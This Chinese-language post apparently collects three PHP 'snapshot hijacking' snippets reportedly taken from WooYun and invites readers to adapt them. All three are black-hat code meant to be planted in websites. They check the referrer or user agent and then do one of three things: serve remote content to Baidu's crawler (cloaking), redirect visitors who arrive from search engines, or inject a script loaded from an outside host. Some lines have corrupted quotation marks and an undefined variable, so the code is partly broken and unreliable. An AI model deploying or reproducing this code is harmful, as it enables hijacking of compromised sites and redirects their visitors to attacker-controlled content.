在乌云上看见的几个php快照劫持代码 在这记录一下 大家用的时候 改一下 自己发挥

第一个

<?php
$file=”http://www.xxx.com”;
$referer=$_SERVER["HTTP_REFERER"];
$agent= strtolower($_SERVER["HTTP_USER_AGENT"]);

if(strstr($referer,”baidu”)&&strstr($referer,”456″))
{
Header(“Location: $url”);
}
if(ereg(“http://www.baidu.com/search/spider.htm”,$agent))
{
$content=file_get_contents($file);
echo $content;
exit;
}
?>

第二个

<?php
error_reporting(0);
$refer=$_SERVER['HTTP_REFERER'];
if(stristr($refer,"baidu.com")||stristr($refer,"sogou.com")||stristr($refer,"soso.com")||stristr($refer,"google.cn")||stristr($refer,"bing.com")||stristr($refer,"youdao.com")||stristr($refer,"google.com.hk")||stristr($refer,"360.cn")||stristr($refer,"google.com.hk"))
{
header("location:http://www.baidu.com");//这个是跳转地址
exit();
}
?>
<script language="javascript" src="http://www."></script>

第三个

<?php
error_reporting(E_ERROR);
header('content-Type: text/html; charset=gb2312');
$come_from="baidu.com#google.com.hk#soso.com#sogou.com#cache.baidu.com#google.cn#baiducontent.com";
$referer = Split("#",$come_from) ;
foreach($referer as $v){
if(stristr($_SERVER['HTTP_REFERER'],$v))
{
echo "<script src='http://www.888.org/q.js'></script>";
exit;
}
else
include("in.php");
}
?>